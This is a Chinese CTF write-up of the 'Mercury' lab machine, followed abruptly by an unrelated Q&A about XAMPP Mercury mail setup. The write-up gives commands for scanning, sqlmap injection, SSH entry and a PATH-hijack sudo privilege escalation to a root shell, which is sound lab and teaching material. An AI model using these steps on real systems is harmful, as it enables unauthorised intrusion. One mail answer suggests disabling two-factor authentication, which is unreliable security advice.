THE PLANETS MERCURY -环境变量的设置提权以及SETENV的理解

Posted 2023-05-04 lisenMiller

主机发现

sudo nmap -sT --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p22,8080 192.168.28.3 -oA nmapscan/detail

sudo nmap -sU --top-ports 20  192.168.28.3　-oA nmapscan/udp

sudo nmap --script=vuln -p22,8080 192.168.28.3 -oA nmapscan/vuln

访问http网页

同时进行爆破目录

sudo dir -u http://xx -w xx 

访问网页时必须要读全todolist,根据开发习惯和交互行问推断技术和可能的漏洞

根据提示不断点击发现一个具有数字id的提示

 利用这个进行sqlmap跑看看能否跑出

sudo sqlmap -u http://xx.xx.xx.xx:8080/mercuryfacts/1 --dbms mysql --dbs --batch#跑出数据库 

 获得用户密码

发现账户密码尝试ssh登录

ssh@xx.xx.xx.xx

成功getshell

权限查看

whoami　　uname -a 　　lsb_release -a(内核版本)　　ip a　　sudo -l　　cat /etc/crontab

查看家目录是否有flag同时发现一个目录

进入此目录并查看txt发现了账号和base64加密的密码对linuxmaster账户的密码进行解密

 切换的linuxmaster用户

su linuxmaster　　xx

查看whoami 　　ip a　　　sudo -l 　　cat /etc/crontab

sudo -l

 利用root账号需要设置一个环境变量才能执行check_syslog.sh这个脚本

查看check_syslog.sh的脚本

可以发现是tail命令运行

通过路径优先查找的方式进行提权

1.用户家目录设置软连接

ln -s /bin/vi tail

2.将当前路径设置为环境变量

export PATH=.:$PATH

#验证

echo $PATH

3.根据SETENV设置环境变量并执行脚本

sudo --preserver-env=PATH /usr/bin/check_syslog.sh

sudo的SETENV标记表示允许用户设置环境变量，而--preserve-env选项表示保留当前环境变量并传递给执行的命令

sudo --preverse-env=PATH /usr/bin/check_syslog.sh 

成功执行了脚本,因为tail在环境变量中指向的时/bin/vi所以成功打开了一个vi界面

在vi界面进行提权的语句时 :!bash

 成功提权

无法使用 Mercury XAMPP 发送邮件

【中文标题】无法使用 Mercury XAMPP 发送邮件

【英文标题】：Can't send mail using Mercury XAMPP

【发布时间】：2015-10-26 04:29:14

【问题描述】：

请帮忙！ 无法使用 Mercury 发送邮件，php 中的 mail() 函数也不起作用。设置在这里。

我一直在寻找各种指南，在 Mercury 中尝试了不同的设置，但没有任何效果。

我的 php.ini 文件设置如下：

SMTP = localhost
smtp_port = 25
sendmail_from =postmaster@localhost

我的 senmail.ini：

smtp_server=localhost
smtp_port=25
error_logfile=error.log
debug_logfile=debug.log

我的 Mercury 设置：

当我尝试发送一封信（文件-发送邮件）时，我出错了：

因此，我使用 mail() 函数的 php 脚本也不起作用（虽然该函数返回 True，但我的 gmail 帐户中没有字母）。

【问题讨论】：

你能解决这个问题吗？

@Anti21，不，对不起；（

【参考方案1】：

您查看过 gmail 设置吗？ Allowed Insecure App 在设置中使用 gmail SMTP 需要使用 gmail 地址发送邮件。禁用two factor auth。服务器地址为smtp.gmail.com，端口为587。

【参考方案2】：

要解决这个问题，你需要使用你的计算机ip，端口转发端口25和110。然后你需要去php.ini并点击ctrl f然后搜索：邮件功能。

然后将该 ip 更改为您的本地计算机 ip。您可以通过键入 ip config 找到它。然后你需要在它要求邮件服务器的地方输入那个 ip。

然后，您需要从您在水星中创建的本地电子邮件帐户发送邮件。电子邮件帐户需要类似于：(username@computerip)。

然后您将保存文件并转到目录：C:\xampp\sendmail 然后单击 sendmail.ini 并执行与 php.ini 中相同的操作，接受它将位于文件顶部。然后保存文件。同样在水星中，检查设置发送中继非本地邮件。

之后，您应该能够使用 php mail() 函数并发送 php 电子邮件。就是这样，你不应该有任何问题。确保删除您当前的配置，然后执行此操作。

【讨论】：

考虑格式化您的答案，以便人们可以查看它。目前的形式是不可读的。